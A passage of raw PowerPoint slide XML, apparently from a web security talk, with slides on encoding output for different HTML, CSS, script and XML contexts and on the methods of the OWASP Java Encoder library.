                  <a:gd name="connsiteX1" fmla="*/ 0 w 1058299"/>
                  <a:gd name="connsiteY1" fmla="*/ 952418 h 2845497"/>
                  <a:gd name="connsiteX2" fmla="*/ 11759 w 1058299"/>
                  <a:gd name="connsiteY2" fmla="*/ 2845497 h 2845497"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1058299" h="2845497">
                    <a:moveTo>
                      <a:pt x="1058299" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="952418"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3920" y="1583444"/>
                      <a:pt x="7839" y="2214471"/>
                      <a:pt x="11759" y="2845497"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">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428869469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Danger:  Multiple Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371599"/>
            <a:ext cx="8229600" cy="640946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Different encoding and validation techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>needed for different contexts!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7221666" y="457200"/>
            <a:ext cx="1465134" cy="1484240"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Oval 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830935" y="2457688"/>
            <a:ext cx="1370229" cy="4400312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="24000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gra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tIns="137160" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML Body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324859" y="2457688"/>
            <a:ext cx="1370229" cy="4400312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="24000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gra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tIns="137160" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML Attributes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3818783" y="2457688"/>
            <a:ext cx="1370229" cy="4400312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="24000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gra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tIns="137160" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;STYLE&gt; Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312707" y="2457688"/>
            <a:ext cx="1370229" cy="4400312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="24000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gra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tIns="137160" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt; Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806630" y="2457688"/>
            <a:ext cx="1370229" cy="4400312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="24000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gra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tIns="137160" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL Fragment Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2612400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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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OWASP Java Encoder Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP_Java_Encoder_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2075486"/>
            <a:ext cx="8686800" cy="369332"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No third party libraries or configuration necessary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="OWAS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876" y="457200"/>
            <a:ext cx="1493924" cy="1487401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2567558"/>
            <a:ext cx="8686800" cy="646331"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This code was designed for high-availability/high-performance encoding functionality. Redesigned for performance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3336629"/>
            <a:ext cx="8686800" cy="369332"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple drop-in encoding functionality.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3828701"/>
            <a:ext cx="8686800" cy="646331"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More complete API (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t> component encoding, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in some regards.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="4597772"/>
            <a:ext cx="8686800" cy="369332"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a Java 1.5 project.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5089842"/>
            <a:ext cx="8686800" cy="369332"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Last updated September 2018 (version 1.2.2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505696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OWASP Java Encoder Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1939755"/>
            <a:ext cx="3886200" cy="1652300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forHtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forHtmlContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forHtmlAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forHtmlUnquotedAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1939754"/>
            <a:ext cx="4114800" cy="1063423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS Contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>Encode#forCssString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>Encode#forCssUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="OWAS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876" y="457200"/>
            <a:ext cx="1493924" cy="1487401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3824941"/>
            <a:ext cx="3886200" cy="1873819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="18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7A6C62"/>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7A6C62"/>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7A6C62"/>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a:t>XML Contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forXmlContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forXmlAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forXmlComment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode#forCDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3262048"/>
            <a:ext cx="4114800" cy="1556482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="18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7A6C62"/>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7A6C62"/>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7A6C62"/>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a:t>JavaScript Contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
